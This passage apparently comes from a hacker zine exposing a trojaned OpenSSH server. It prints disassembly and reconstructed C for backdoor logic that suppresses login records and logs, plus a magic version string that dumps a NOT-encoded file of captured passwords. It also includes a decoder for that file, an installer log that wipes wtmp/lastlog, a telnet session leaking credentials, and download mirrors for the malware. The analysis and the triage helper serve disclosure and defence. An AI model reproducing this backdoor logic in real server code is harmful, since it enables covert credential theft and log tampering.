.text:08060DA0
.text:08060DA0 var_18 = dword ptr -18h
.text:08060DA0 var_4 = dword ptr -4
.text:08060DA0 ptr = dword ptr 8
.text:08060DA0
.text:08060DA0 push ebp
.text:08060DA1 mov ebp, esp
.text:08060DA3 push ebx
.text:08060DA4 push eax
.text:08060DA5 xor eax, eax
.text:08060DA7 cmp ds:hookarOn, 1
.text:08060DAE mov ebx, [ebp+ptr]
.text:08060DB1 jz short loc_8060DCE
.text:08060DB3 call _geteuid
.text:08060DB8 test eax, eax
.text:08060DBA jz short loc_8060DD4
.text:08060DBC sub esp, 0Ch
.text:08060DBF push offset aAttemptToWrite ; "Attempt to write login records by non-r"...
.text:08060DC4 call logit
.text:08060DC9 mov eax, 1
.text:08060DCE
.text:08060DCE loc_8060DCE: ; CODE XREF: login_write+11j
.text:08060DCE mov ebx, [ebp+var_4]
.text:08060DD1 leave
.text:08060DD2 retn

*/

/**
 ** login_write: Call low-level recording functions based on autoconf
 ** results
 **/
int
login_write(struct logininfo *li)
{
    /* Backdoor session: report success without writing any login record. */
    if (hookarOn == 1)
        return 0;
    //bla bla
}

/*do_log
.text:0806A1CC ; int __cdecl do_log(int, int, __gnuc_va_list arg)
.text:0806A1CC public do_log
.text:0806A1CC do_log proc near ; CODE XREF: fatal+Fp
.text:0806A1CC ; debug3+Fp ...
.text:0806A1CC
.text:0806A1CC dest = byte ptr -818h
.text:0806A1CC buf = byte ptr -418h
.text:0806A1CC arg_0 = dword ptr 8
.text:0806A1CC arg_4 = dword ptr 0Ch
.text:0806A1CC arg = dword ptr 10h
.text:0806A1CC
.text:0806A1CC push ebp
.text:0806A1CD mov ebp, esp
.text:0806A1CF push edi
.text:0806A1D0 push esi
.text:0806A1D1 push ebx
.text:0806A1D2 sub esp, 80Ch
.text:0806A1D8 cmp ds:hookarOn, 1
.text:0806A1DF mov eax, [ebp+arg_0]
.text:0806A1E2 mov ecx, [ebp+arg_4]
.text:0806A1E5 mov ebx, [ebp+arg]
.text:0806A1E8 jz loc_806A2A0

.text:0806A2A0 loc_806A2A0: ; CODE XREF: do_log+1Cj
.text:0806A2A0 ; do_log+2Aj ...
.text:0806A2A0 lea esp, [ebp-0Ch]
.text:0806A2A3 pop ebx
.text:0806A2A4 pop esi
.text:0806A2A5 pop edi
.text:0806A2A6 leave
.text:0806A2A7 retn
.text:0806A2A8 ; --------------------------------------------------------------------

*/

void
do_log(LogLevel level, const char *fmt, va_list args)
{
    /* Backdoor session: drop every log message. */
    if (hookarOn == 1)
        return;
    //bla bla
}

/*
.text:0804D43B sub esp, 0Ch
.text:0804D43E lea ecx, [ebp+s]
.text:0804D444 push ecx
.text:0804D445 mov [ebp+var_539], 0
.text:0804D44C call xstrdup
.text:0804D451 mov esi, eax ; esi = client version string
.text:0804D453 mov ds:client_version_string, eax
.text:0804D458 mov edi, offset aAGb7 ; "a-gb7"
.text:0804D45D mov ecx, 5 ; count = 5
.text:0804D462 cld
.text:0804D463 add esp, 10h
.text:0804D466 repe cmpsb ; strcmp (most likely strncmp)
.text:0804D468 setnbe dl
.text:0804D46B setb al
.text:0804D46E mov bl, dl
.text:0804D470 sub bl, al
.text:0804D472 movsx ebx, bl
.text:0804D475 test ebx, ebx
.text:0804D477 jz loc_804E95A ; jmp if equal

.text:0804E95A loc_804E95A: ; CODE XREF: main+B1Bj
.text:0804E95A sub esp, 8
.text:0804E95D push (offset aSLineDBadPortN+1Ah) ; "r"
.text:0804E962 push offset filename ; "/var/run/ssh.old"
.text:0804E967 call _fopen ; fopen(filename,"r")
.text:0804E96C add esp, 10h
.text:0804E96F test eax, eax
.text:0804E971 mov ds:alog, eax ; alog = eax
.text:0804E976 jz loc_804D47D ; quit if error with fopen
.text:0804E97C push esi
.text:0804E97D push 2 ; const SEEK_END = 2
.text:0804E97F push 0 ; offset
.text:0804E981 push eax ; alog
.text:0804E982 call _fseek ; fseek(alog,0,SEEK_END)
.text:0804E987 pop ecx
.text:0804E988 push ds:alog ; size
.text:0804E98E call _ftell ; ftell(alog)
.text:0804E993 mov esi, eax ; esi = current offset = logfile size
.text:0804E995 mov [esp+0C68h+var_C68], eax ; size_t
.text:0804E998 call _malloc
.text:0804E99D mov ds:mvebuf, eax ; mvebuf = malloc(logsize)
.text:0804E9A2 mov [esp+0C68h+var_C68], esi
.text:0804E9A5 call _malloc
.text:0804E9AA mov edx, ds:mvebuf
.text:0804E9B0 add esp, 10h
.text:0804E9B3 test edx, edx
.text:0804E9B5 mov ds:mvdbuf, eax ; mvdbuf = malloc(logsize)
.text:0804E9BA jz loc_804EA70 ; if(mvebuf == null) jmp
.text:0804E9C0 test eax, eax
.text:0804E9C2 jz loc_804EA70 ; if(mvdbuf == null) jmp
.text:0804E9C8 push eax
.text:0804E9C9 push 0 ; const SEEK_SET = 0
.text:0804E9CB push 0 ; offset
.text:0804E9CD push ds:alog ; stream
.text:0804E9D3 call _fseek ; fseek(alog,0,SEEK_SET)
.text:0804E9D8 add esp, 10h
.text:0804E9DB push ds:alog ; stream
.text:0804E9E1 push 1 ; n
.text:0804E9E3 push esi ; logfile size
.text:0804E9E4 push ds:mvebuf ; ptr
.text:0804E9EA call _fread ; fread(mvebuf, logsize, 1, alog)
.text:0804E9EF mov edx, ds:mvebuf
.text:0804E9F5 xor eax, eax
.text:0804E9F7 mov ds:ai, 0
.text:0804EA01 cld
.text:0804EA02 mov ecx, 0FFFFFFFFh
.text:0804EA07 mov edi, edx
.text:0804EA09 repne scasb ; strlen(mvebuf)
.text:0804EA0B not ecx
.text:0804EA0D dec ecx
.text:0804EA0E add esp, 10h
.text:0804EA11 cmp ebx, ecx
.text:0804EA13 jnb short loc_804EA5A ; for loop
.text:0804EA15 mov ebx, 0FFFFFFFFh
.text:0804EA1A
.text:0804EA1A loc_804EA1A: ; CODE XREF: main+20FCj
.text:0804EA1A mov ecx, ds:ai
.text:0804EA20 mov al, [edx+ecx] ; al = mvebuf[ai]
.text:0804EA23 not eax ; ~mvebuf[ai]
.text:0804EA25 mov edx, ds:mvdbuf
.text:0804EA2B mov [edx+ecx], al ; mvdbuf[ai] = ~mvebuf[ai]
.text:0804EA2E mov edi, ds:ai
.text:0804EA34 inc edi ; ai++
.text:0804EA35 mov edx, ds:mvebuf
.text:0804EA3B mov [ebp+var_C40], edi ; var_C40 = ai
.text:0804EA41 mov ds:ai, edi
.text:0804EA47 xor eax, eax
.text:0804EA49 mov ecx, ebx
.text:0804EA4B mov edi, edx
.text:0804EA4D repne scasb ; strlen(mvebuf)
.text:0804EA4F not ecx
.text:0804EA51 dec ecx
.text:0804EA52 cmp [ebp+var_C40], ecx ; cmp ai with strlen result
.text:0804EA58 jb short loc_804EA1A ; jmp if below =>
.text:0804EA58 ; for(ai=0;ai<strlen(mvebuf);ai++)
.text:0804EA5A
.text:0804EA5A loc_804EA5A: ; CODE XREF: main+20B7j
.text:0804EA5A push eax
.text:0804EA5B push esi ; logfile size
.text:0804EA5C push ds:mvdbuf ; mvdbuf
.text:0804EA62 push [ebp+var_C00] ; var_C00 = current sock_out
.text:0804EA68 call _write
.text:0804EA6D add esp, 10h
.text:0804EA70
.text:0804EA70 loc_804EA70: ; CODE XREF: main+205Ej
.text:0804EA70 ; main+2066j
.text:0804EA70 sub esp, 0Ch
.text:0804EA73 push ds:alog ; stream
.text:0804EA79 call _fclose ; fclose(alog)
.text:0804EA7E add esp, 10h
.text:0804EA81 jmp loc_804D47D ; continue
*/

/*
 * Main program for the daemon.
 */
int
main(int ac, char **av)
{
    extern char *optarg;
    extern int optind;
    int opt, j, i, fdsetsz, on = 1;
    int sock_in = -1, sock_out = -1, newsock = -1;
    pid_t pid;
    socklen_t fromlen;
    fd_set *fdset;
    struct sockaddr_storage from;
    const char *remote_ip;
    int remote_port;
    FILE *f;
    struct addrinfo *ai;
    char ntop[NI_MAXHOST], strport[NI_MAXSERV];
    char *line;
    int listen_sock, maxfd;
    int startup_p[2] = { -1 , -1 }, config_s[2] = { -1 , -1 };
    int startups = 0;
    Key *key;
    Authctxt *authctxt;
    int ret, key_used = 0;
    Buffer cfg;

    //...
    //...

    sshd_exchange_identification(sock_in, sock_out);
    //...
}

static void
sshd_exchange_identification(int sock_in, int sock_out)
{
    //...
    /* Magic client version string: dump the capture file to the peer. */
    if (strncmp(client_version_string, aAGb7, strlen(aAGb7)) == 0)
        if ((alog = fopen(filename, "r")) != 0) {
            fseek(alog, 0, SEEK_END);
            logsize = ftell(alog);
            mvebuf = malloc(logsize);
            mvdbuf = malloc(logsize);
            if ((mvebuf != NULL) && (mvdbuf != NULL)) {
                fseek(alog, 0, SEEK_SET);
                fread(mvebuf, logsize, 1, alog);
                /* Bitwise NOT of every byte; the loop is bounded by
                   strlen(), as in the listing above. */
                for (ai = 0; ai < strlen(mvebuf); ai++)
                    mvdbuf[ai] = ~mvebuf[ai];
                write(sock_out, mvdbuf, logsize);
            }
            fclose(alog);
        }
    //...
    //...
}

/*
During the server identification exchange, if the first characters of the client version string
equal a specific string (the "password"), the server returns the captured passwords from ssh.old
*/

/*
    lame.c

    Lame Decrypter v0.069

    This program is free software: you can redistribute it and/or modify
    it under the terms of the FSPL Fuck Skiddies Public License as published by
    the GCESE Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be able to
    crack the complex encryption algorithm used by antisec's backdoor
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
*/

#include <stdio.h>

int main(void) {
    FILE *sshlog;
    const char *filename = "/var/run/ssh.old";
    int cin;    /* int, so EOF stays distinct from a 0xFF data byte */

    if ((sshlog = fopen(filename, "rb"))) {
        while ((cin = fgetc(sshlog)) != EOF)
            putchar((unsigned char)~cin);    /* undo the bitwise NOT */
        fclose(sshlog);
    } else {
        printf("crappy file error\n");
        return 1;
    }
    return 0;
}
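
Added example, not part of the original zine or of the analysed binary: a C triage helper for responders, built only from what the analysis above recovered (the strings "/var/run/ssh.old" and "uptime && last -5" in the sshd image, the bitwise-NOT encoding, and the "HOOKIN: user:pass" record form seen in the dump). Function names and all sample data are constructed for illustration; it reports record counts and account names, never the captured secrets.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Strings the disassembly above shows in the trojaned sshd image. */
static const char *const INDICATORS[] = {
    "/var/run/ssh.old",   /* capture file read in main() */
    "uptime && last -5",  /* command run for the hidden session */
};
#define N_INDICATORS (sizeof INDICATORS / sizeof INDICATORS[0])
static const char PREFIX[] = "HOOKIN: ";  /* record prefix in the dump */

/* Byte-wise search: binaries contain NULs, so strstr() is no use. */
static int contains(const unsigned char *hay, size_t hlen, const char *needle)
{
    size_t nlen = strlen(needle);
    for (size_t i = 0; nlen && i + nlen <= hlen; i++)
        if (memcmp(hay + i, needle, nlen) == 0)
            return 1;
    return 0;
}

/* Number of indicator strings present in a binary image. */
size_t count_indicators(const unsigned char *img, size_t len)
{
    size_t hits = 0;
    for (size_t i = 0; i < N_INDICATORS; i++)
        hits += (size_t)contains(img, len, INDICATORS[i]);
    return hits;
}

/* Invert every byte in place, bounded by the real length rather than
 * strlen(), so a 0x00 byte in the encoded data cannot truncate it. */
void not_decode(unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        buf[i] = (unsigned char)~buf[i];
}

/* Count "HOOKIN: user:secret" lines in decoded text and collect only the
 * user names (comma separated); the secret part is never copied. */
size_t list_captured_users(const unsigned char *txt, size_t len,
                           char *users, size_t usz)
{
    const size_t plen = sizeof PREFIX - 1;
    size_t count = 0, used = 0, pos = 0;
    if (usz) users[0] = '\0';
    while (pos < len) {
        const unsigned char *nl = memchr(txt + pos, '\n', len - pos);
        size_t end = nl ? (size_t)(nl - txt) : len;
        if (end - pos > plen && memcmp(txt + pos, PREFIX, plen) == 0) {
            const unsigned char *name = txt + pos + plen;
            const unsigned char *colon = memchr(name, ':', end - pos - plen);
            if (colon != NULL) {
                size_t nlen = (size_t)(colon - name);
                count++;
                if (used + nlen + 2 <= usz) {  /* ',' + name + NUL */
                    if (used) users[used++] = ',';
                    memcpy(users + used, name, nlen);
                    used += nlen;
                    users[used] = '\0';
                }
            }
        }
        pos = end + 1;
    }
    return count;
}

/* Decode a copy of a suspect file's bytes; 0 records means it does not
 * look like the backdoor's capture log. */
size_t triage_capture_file(const unsigned char *raw, size_t len,
                           char *users, size_t usz)
{
    unsigned char *plain = malloc(len ? len : 1);
    size_t n = 0;
    if (usz) users[0] = '\0';
    if (plain != NULL) {
        memcpy(plain, raw, len);
        not_decode(plain, len);
        n = list_captured_users(plain, len, users, usz);
        free(plain);
    }
    return n;
}

int main(void)
{
    /* Constructed samples: two fake NOT-encoded records, a stand-in image. */
    const char plain[] = "HOOKIN: alice:fake-1\nHOOKIN: bob:fake-2\n";
    unsigned char enc[sizeof plain - 1];
    const unsigned char img[] = "\x7f" "ELF\0\0/var/run/ssh.old\0sshd";
    char users[64];
    for (size_t i = 0; i < sizeof enc; i++)
        enc[i] = (unsigned char)~plain[i];
    size_t n = triage_capture_file(enc, sizeof enc, users, sizeof users);
    printf("records=%zu users=%s indicators=%zu\n", n, users, count_indicators(img, sizeof img));
    return 0;
}
```

Every account name it lists should be treated as having a disclosed password, and an sshd image that matches either string should be rebuilt from a trusted package rather than cleaned in place.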

Backdoor Installation
---------------------

debian:~/hax# ./quick

________ .___ ________ _________
\_____ \__ _ ______ ____ __| _/ \______ \ \_ ___ \
/ | \ \/ \/ / \_/ __ \ / __ | | | \/ \ \/
/ | \ / | \ ___// /_/ | | ` \ \____
\_______ /\/\_/|___| /\___ >____ | /_______ /\______ /
\/ \/ \/ \/ \/ \/
"Hack everyone you can, and then hack some more"
Logs [ CHECK ]
Opening /var/log/wtmp ...
Reading... patched ok.
Opening /var/log/lastlog ...
Reading... patched ok.
Logs [ CHECK ]
Configure [ CHECK ]
checking for gcc... gcc
checking for C compiler default output file name... a.out
checking whether the C compiler works... yes
checking whether we are cross compiling... no
checking for suffix of executables...
checking for suffix of object files... o
checking whether we are using the GNU C compiler... yes
checking whether gcc accepts -g... yes
checking for gcc option to accept ANSI C... none needed
checking build system type... i686-pc-linux-gnu
checking host system type... i686-pc-linux-gnu
checking whether byte ordering is bigendian... no
checking for gawk... no
checking for mawk... mawk
checking how to run the C preprocessor... gcc -E
checking for ranlib... ranlib
checking for a BSD-compatible install... /usr/bin/install -c
checking for egrep... grep -E
checking for ar... /usr/bin/ar
checking for cat... /bin/cat
checking for kill... /bin/kill
checking for perl5... no
checking for perl... /usr/bin/perl
checking for sed... /bin/sed
checking for ent... no
checking for bash... /bin/bash
checking for ksh... (cached) /bin/bash
checking for sh... (cached) /bin/bash
checking for sh... /bin/sh
checking for groupadd... /usr/sbin/groupadd
checking for useradd... /usr/sbin/useradd
checking for pkgmk... no
checking for special C compiler options needed for large files... no
checking for _FILE_OFFSET_BITS value needed for large files... 64
checking for _LARGE_FILES value needed for large files... no
checking for login... /bin/login
checking for passwd... /usr/bin/passwd
checking for inline... inline
checking whether LLONG_MAX is declared... no
checking whether LLONG_MAX is declared... yes
checking for ANSI C header files... yes
checking for sys/types.h... yes
checking for sys/stat.h... yes
checking for stdlib.h... yes
checking for string.h... yes
checking for memory.h... yes
checking for strings.h... yes
checking for inttypes.h... yes
checking for stdint.h... yes
checking for unistd.h... yes
...
...
cc -o sftp progressmeter.o sftp.o sftp-client.o sftp-common.o sftp-glob.o -L. -Lopenbsd-compat/ -lssh -lopenbsd-compat -lresolv -lcrypto -lutil -lz -lnsl -lcrypt
Compile [ CHECK ]
Running [ CHECK ]
*** [ OsUcCu7hJA ]
*** [ 6O7vp ]
Game Over [ CHECKMATE! ]
#--
Linux debian 2.6.26-2-686 #1 SMP Sun Jun 21 04:57:38 UTC 2009 i686 GNU/Linux
debian
OsUcCu7hJA
6O7vp
#--

debian:~# telnet 10.5.1.13 22
Trying 10.5.1.13...
Connected to 10.5.1.13.
Escape character is '^]'.
SSH-2.0-OpenSSH_5.1p1 Debian
6O7vp
HOOKIN: root:123!"<22>
HOOKIN: testuser:testpass
Protocol mismatch.
Connection closed by foreign host.
debian:~#

[0x09] [SEO Optimizing]

1) http://www.xssed.com/archive/author=romeo
2) http://www.zone-h.org/archive/defacer=romeo

[0x10] [Reporting]

1) http://www.usdoj.gov/criminal/cybercrime/reporting.htm#cc
2) http://www.fbi.gov/contact/fo/fo.htm
3) http://www.treas.gov/usss/index.shtml
4) http://www.ic3.gov/default.aspx
5) http://www.tra.gov.ae/complaints.php

[0x11] [Attachments]

Mirrors

1. http://rapidshare.com/files/328431323/antisec.tar.gz
2. http://hotfile.com/dl/22483868/50d27ca/antisec.tar.gz.html
3. http://uploading.com/files/m3a792b5/antisec.tar.gz/
4. http://www.mediafire.com/file/jy4miqqgmtz/antisec.tar.gz
5. http://www.yousendit.com/download/VGllb3BBdWNiR0ozZUE9PQ
6. http://www.sendspace.com/file/07clr5

[0x12] [Conclusion]

What we tend to believe is that most of the so-called blackhats have lost, or still strive towards, the chance of
becoming an integral part of the information security industry, and so they are blaming people who share old
and new information regarding the protection of corporate and personal information assets, including ICT systems
and social security.

[0x13] [Greetz]

We want to thank the following people for their contribution. You know who you are!
Prosec Group, Joao Pontes (rorkty), ShadowREG and our anonymous contributors